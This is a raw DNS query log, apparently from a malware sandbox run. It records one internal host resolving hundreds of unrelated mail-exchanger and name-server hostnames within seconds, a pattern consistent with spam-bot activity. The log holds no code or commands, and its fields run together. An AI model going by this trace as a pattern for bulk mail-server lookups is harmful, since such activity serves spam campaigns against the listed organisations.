                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.764333010 CEST192.168.2.39.9.9.90x46a7Standard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.766467094 CEST192.168.2.31.1.1.10x46a7Standard query (0)mxa-003d6e01.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.767138958 CEST192.168.2.38.8.8.80x46a7Standard query (0)pcl-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.767822981 CEST192.168.2.31.0.0.10x46a7Standard query (0)mspool.cdt.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.768475056 CEST192.168.2.38.8.4.40x46a7Standard query (0)cury-net.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.779761076 CEST192.168.2.39.9.9.90x56a7Standard query (0)gourmet7.spamgourmet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.779761076 CEST192.168.2.3192.12.94.300x56a7Standard query (0)mx.zoho.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.780989885 CEST192.168.2.3208.84.67.2080x56a7Standard query (0)mxa-0019c401.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.794487953 CEST192.168.2.3156.154.132.2000x65a7Standard query (0)mx02.xnote.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.796864986 CEST192.168.2.3208.84.67.2080x65a7Standard query (0)mxa-001d4f01.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.796952963 CEST192.168.2.3192.12.94.300x65a7Standard query (0)mxpro02.yovocloud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.798448086 CEST192.168.2.3199.19.56.10x65a7Standard query (0)smtp-agent12.mountsinai.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.798819065 CEST192.168.2.3202.12.27.330x65a7Standard query (0)harland.myds.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.801184893 CEST192.168.2.3192.12.94.300x65a7Standard query (0)mail.hope-mail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.811573029 CEST192.168.2.3109.122.98.1140x75a7Standard query (0)smtp.vektor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.812834024 CEST192.168.2.3208.84.67.2080x75a7Standard query (0)mxb-0077ce01.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.814137936 CEST192.168.2.3104.47.38.80x75a7Standard query (0)ccidialog-de0i.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.815532923 CEST192.168.2.3104.47.38.80x75a7Standard query (0)adlerlacke-com01c.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.816787004 CEST192.168.2.3192.12.94.300x75a7Standard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.817884922 CEST192.168.2.3104.47.38.80x75a7Standard query (0)adlerlacke-com01c.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.821182966 CEST192.168.2.3192.12.94.300x75a7Standard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.827738047 CEST192.168.2.3192.12.94.300x84a7Standard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.827738047 CEST192.168.2.3192.12.94.300x84a7Standard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.829273939 CEST192.168.2.3104.47.38.80x84a7Standard query (0)adlerlacke-com01c.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.830462933 CEST192.168.2.3192.12.94.300x84a7Standard query (0)publicms1.mail2world.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.831502914 CEST192.168.2.3193.232.128.60x84a7Standard query (0)mx01.nicmail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.832588911 CEST192.168.2.31.1.1.10x606bStandard query (0)ns6444.hostgator.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.933917046 CEST192.168.2.31.1.1.10xc917Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.000696898 CEST192.168.2.3192.254.233.1500x5dabStandard query (0)polishprincess.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.002294064 CEST192.168.2.3104.47.38.80x7cabStandard query (0)visimax-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.003422976 CEST192.168.2.3192.12.94.300x7cabStandard query (0)dd78d3c2.21.ik2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.004455090 CEST192.168.2.31.1.1.10x59a2Standard query (0)ns1.pontualti.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.687194109 CEST192.168.2.31.1.1.10x3ab4Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.704051018 CEST192.168.2.3186.227.204.610xe6b6Standard query (0)linochaves.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.716839075 CEST192.168.2.370.167.153.350xf6b6Standard query (0)relay.sumix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.720300913 CEST192.168.2.3162.159.24.1980xf6b6Standard query (0)dessy.com.2.0001.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.720300913 CEST192.168.2.3192.12.94.300xf6b6Standard query (0)inbound-smtp.us-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.721184015 CEST192.168.2.3156.154.124.650xf6b6Standard query (0)mx3.pangia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.721215010 CEST192.168.2.3192.12.94.300xf6b6Standard query (0)mx00.ionos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.723387003 CEST192.168.2.379.98.120.730xf6b6Standard query (0)icsi.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.723392963 CEST192.168.2.3162.159.24.2020xf6b6Standard query (0)mx.anitadarkvideos.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.725193977 CEST192.168.2.31.1.1.10x2ecfStandard query (0)ns1.webhs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.997370005 CEST192.168.2.31.1.1.10xda98Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.056957960 CEST192.168.2.345.76.116.2090x5ebdStandard query (0)crosstech.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.056958914 CEST192.168.2.389.26.240.750x5ebdStandard query (0)plenimagem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.058012962 CEST192.168.2.31.1.1.10xc63eStandard query (0)nsa.pegasodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.158934116 CEST192.168.2.31.1.1.10x634eStandard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.381859064 CEST192.168.2.381.29.220.200xd6c3Standard query (0)immobiliarepunto.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.389270067 CEST192.168.2.31.1.1.10xb12fStandard query (0)ns1.yandex.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.710370064 CEST192.168.2.3213.180.193.10x4fcaStandard query (0)mx.yandex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.710371017 CEST192.168.2.3162.159.24.2020x4fcaStandard query (0)mx.anitadarkvideos.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.712842941 CEST192.168.2.3208.80.124.20x4fcaStandard query (0)mx1.pythian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.712847948 CEST192.168.2.3208.84.67.2080x4fcaStandard query (0)mxa-0018d701.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.713969946 CEST192.168.2.31.1.1.10x9d88Standard query (0)ns2.ipage.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.880168915 CEST192.168.2.3192.12.94.300x75ceStandard query (0)prtcnetmx.prtcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.880212069 CEST192.168.2.365.254.254.1510x75ceStandard query (0)mx.homebeautiful.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.881571054 CEST192.168.2.3192.31.80.300x75ceStandard query (0)mx2.mail.ovh.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.888489962 CEST192.168.2.3192.12.94.300x85ceStandard query (0)mx01.naspers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.889590025 CEST192.168.2.3192.12.94.300x85ceStandard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.890889883 CEST192.168.2.3104.47.38.80x85ceStandard query (0)cpacanada-ca.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.892045975 CEST192.168.2.3192.12.94.300x85ceStandard query (0)lbconstructioninc.com.mx1.rcimx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.893168926 CEST192.168.2.31.1.1.10x5d10Standard query (0)ns1.syrahost.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.195477009 CEST192.168.2.327.124.125.10xdd5Standard query (0)mail.culver.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.196666002 CEST192.168.2.3192.12.94.300xdd5Standard query (0)fojab-se.mx1.staysecuregroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.198714972 CEST192.168.2.3192.12.94.300xdd5Standard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.198719025 CEST192.168.2.345.142.220.390xdd5Standard query (0)mx3.alien8.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.216648102 CEST192.168.2.397.79.236.550x4bd5Standard query (0)domenicamato.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.218415022 CEST192.168.2.3108.162.193.1600x4bd5Standard query (0)mail.eilhk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.218415022 CEST192.168.2.3192.12.94.300x4bd5Standard query (0)publicms1.mail2world.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.219913960 CEST192.168.2.3104.47.38.80x4bd5Standard query (0)foodallergy-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.222455025 CEST192.168.2.3157.131.0.390x4bd5Standard query (0)mailin-01.mx.sonic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.222660065 CEST192.168.2.3208.80.124.20x4bd5Standard query (0)mymail.markerman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.224754095 CEST192.168.2.3204.61.216.1050x4bd5Standard query (0)mail.lb.auchan.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.224792004 CEST192.168.2.3193.0.14.1290x4bd5Standard query (0)sc133.sgcloudhosting.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.232355118 CEST192.168.2.3161.53.160.1000xf1d6Standard query (0)mx100.nn.hrA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.234798908 CEST192.168.2.31.1.1.10x9ab2Standard query (0)ns-769.awsdns-32.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.234894037 CEST192.168.2.3208.84.67.2080xf1d6Standard query (0)mxb-00115402.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.410572052 CEST192.168.2.3205.251.195.10x91d9Standard query (0)relay.coreconsulting.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.413088083 CEST192.168.2.3162.159.24.1980x91d9Standard query (0)idealtile.com.2.0001.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.413088083 CEST192.168.2.3137.118.1.280x91d9Standard query (0)peoplescom-net.mx.av-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.413985968 CEST192.168.2.3192.12.94.300x91d9Standard query (0)ms2.mail2world.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.416352987 CEST192.168.2.3208.84.67.2080x91d9Standard query (0)mxa-00181c02.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.416356087 CEST192.168.2.3162.159.26.1850x91d9Standard query (0)mail.trinom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.417262077 CEST192.168.2.3192.12.94.300x91d9Standard query (0)mx.breakthur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.420373917 CEST192.168.2.31.1.1.10x5ce8Standard query (0)ns2.webunlimited.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.455131054 CEST192.168.2.31.1.1.10x386bStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.469185114 CEST192.168.2.31.1.1.10xef6Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.590473890 CEST192.168.2.3208.88.72.1110xa8ddStandard query (0)scanner1.bvcaa.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.591417074 CEST192.168.2.3195.8.222.240xb7ddStandard query (0)mail.glasslam-asia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.592327118 CEST192.168.2.3199.231.93.2370xd7ddStandard query (0)mail.resumesrv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.597181082 CEST192.168.2.31.1.1.10x93bStandard query (0)ns0.ntt.co.thA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.986541033 CEST192.168.2.31.1.1.10x61dcStandard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.180275917 CEST192.168.2.3116.68.146.10xcbecStandard query (0)mail.gsl-th.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.182168961 CEST192.168.2.3104.47.38.80xcbecStandard query (0)comstarauto-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.183239937 CEST192.168.2.3192.12.94.300xcbecStandard query (0)netoverdrive-com-au.p10.mxthunder.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.184799910 CEST192.168.2.3208.84.67.2080xdaecStandard query (0)mxb-0006de01.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.185956001 CEST192.168.2.3213.180.193.10x80eeStandard query (0)mx.yandex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.187617064 CEST192.168.2.3192.12.94.300x80eeStandard query (0)li585-225.members.linode.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.200683117 CEST192.168.2.350.87.144.210x90eeStandard query (0)mail.sequere.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.202527046 CEST192.168.2.3192.12.94.300x90eeStandard query (0)mx3c40.carrierzone.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.202527046 CEST192.168.2.3193.232.128.60x90eeStandard query (0)mx01.nicmail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.203824997 CEST192.168.2.3208.84.67.2080x90eeStandard query (0)mx0a-00170501.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.205765963 CEST192.168.2.3192.31.80.300x90eeStandard query (0)fsr-mx.email-protect.gosecure.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.205765963 CEST192.168.2.3192.12.94.300x90eeStandard query (0)mail.balkam-group.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.206628084 CEST192.168.2.3192.12.94.300x90eeStandard query (0)fwd1.porkbun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.207452059 CEST192.168.2.397.74.103.40x90eeStandard query (0)mail.gwyneddwealthpartners.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.216468096 CEST192.168.2.3192.31.80.300xceeeStandard query (0)custmx.cscdns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.218641043 CEST192.168.2.3192.12.94.300xceeeStandard query (0)mail.mailinator.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.219587088 CEST192.168.2.345.142.220.390xceeeStandard query (0)mx.leonet.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.220818043 CEST192.168.2.31.1.1.10x4b1bStandard query (0)ns1.zprtk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.406600952 CEST192.168.2.3192.169.156.1030x62f3Standard query (0)mail.meta-lab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.408318996 CEST192.168.2.3104.47.38.80x62f3Standard query (0)sgcm-net.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.421051979 CEST192.168.2.3194.0.14.10x18f5Standard query (0)volny-cz-20mx1.eco-mx.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.421052933 CEST192.168.2.3162.159.24.1980x18f5Standard query (0)fallsburgny.com.1.0001.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.422250986 CEST192.168.2.3104.47.38.80x18f5Standard query (0)nomatech-net.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.423091888 CEST192.168.2.3192.12.94.300x18f5Standard query (0)mx1.active24.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.424210072 CEST192.168.2.3208.84.67.2080x18f5Standard query (0)mxa-0010b102.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.425019979 CEST192.168.2.3192.12.94.300x18f5Standard query (0)mx1.active24.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.425905943 CEST192.168.2.3192.12.94.300x18f5Standard query (0)cluster-h.mailcontrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.426984072 CEST192.168.2.31.1.1.10x8a0Standard query (0)ns1.regzone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.532152891 CEST192.168.2.31.1.1.10x3e30Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.638884068 CEST192.168.2.323.92.29.430xcbf9Standard query (0)mail3.ocel.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.639955044 CEST192.168.2.3216.106.1.2540xcbf9Standard query (0)mxa.inbound.socket.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.640850067 CEST192.168.2.3108.162.193.1420xcbf9Standard query (0)mail.networkvenezuela.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.654637098 CEST192.168.2.3192.31.80.300xaffbStandard query (0)mx1.mail.ovh.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.655941010 CEST192.168.2.3104.47.38.80xaffbStandard query (0)adlerlacke-com01c.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.658024073 CEST192.168.2.3208.84.67.2080xaffbStandard query (0)mxa-00620701.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.659297943 CEST192.168.2.3202.46.190.1300xaffbStandard query (0)mx1.orcon.net.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.660276890 CEST192.168.2.3192.12.94.300xaffbStandard query (0)hsmx149.cn4e.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.661642075 CEST192.168.2.3104.47.38.80xaffbStandard query (0)tph-ca.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.669730902 CEST192.168.2.3192.31.80.300xbffbStandard query (0)uk.mx1.mailanyone.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.670880079 CEST192.168.2.345.142.220.390xbffbStandard query (0)antispam.solunet.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.671978951 CEST192.168.2.3192.12.94.300xbffbStandard query (0)w01a08c1.kasserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.672820091 CEST192.168.2.314.29.61.460xbffbStandard query (0)mailex.2980.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.674666882 CEST192.168.2.3108.162.193.1260xbffbStandard query (0)send.aweber.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.674668074 CEST192.168.2.3130.226.213.1380xbffbStandard query (0)mail51.gullestrupnet.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.676202059 CEST192.168.2.3192.31.80.300xbffbStandard query (0)ftcispnet-mx.email-protect.gosecure.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.677402973 CEST192.168.2.3192.12.94.300xbffbStandard query (0)d160221b.ess.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.678252935 CEST192.168.2.345.142.220.390xbffbStandard query (0)mail.telecompost.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.685452938 CEST192.168.2.3192.12.94.300xcffbStandard query (0)mx2.hostinger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.687115908 CEST192.168.2.3192.12.94.300xcffbStandard query (0)mx-01.eapps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.688283920 CEST192.168.2.3104.47.38.80xcffbStandard query (0)thehealthline-ca.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.689425945 CEST192.168.2.3199.19.56.10xcffbStandard query (0)mail.pangea.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.690434933 CEST192.168.2.3205.251.192.2030xcffbStandard query (0)mail.nhs.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.691279888 CEST192.168.2.3192.31.80.300xcffbStandard query (0)mail.yaxmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.693125963 CEST192.168.2.3162.159.24.1980xcffbStandard query (0)reaganfoundation.org.1.0001.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.694180012 CEST192.168.2.3137.118.1.280xcffbStandard query (0)mepotelco-net.mx.av-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.695099115 CEST192.168.2.3192.12.94.300xcffbStandard query (0)w4.aerospaceemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.701092005 CEST192.168.2.3192.12.94.300xdefbStandard query (0)mx-in01.eu.retarus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.703085899 CEST192.168.2.3194.0.6.10xdefbStandard query (0)relay.mx.skynet.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.703085899 CEST192.168.2.3162.159.24.800xdefbStandard query (0)mail.terradoliva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.704791069 CEST192.168.2.3185.108.181.1910xdefbStandard query (0)mx.voiaj.mdA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.706147909 CEST192.168.2.3208.84.67.2080xdefbStandard query (0)mxa-00160c04.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.707139969 CEST192.168.2.3192.31.80.300xdefbStandard query (0)swc-tx-com.mx1-us.mailanyone.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.707990885 CEST192.168.2.3192.33.4.120xdefbStandard query (0)mx3-hosting.jellyfish.systemsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.709167957 CEST192.168.2.3208.84.67.2080xdefbStandard query (0)mxb-001ba701.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.710423946 CEST192.168.2.31.1.1.10x9c0aStandard query (0)ns13.asurahosting.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.869823933 CEST192.168.2.31.1.1.10xf77aStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.876091957 CEST192.168.2.3198.251.89.1640x1802Standard query (0)mail.hotmai.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.889108896 CEST192.168.2.3208.84.67.2080x2802Standard query (0)mxa-00168f01.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.890114069 CEST192.168.2.31.1.1.10xf989Standard query (0)ns1.garr.netA (IP address)IN (0x0001)false
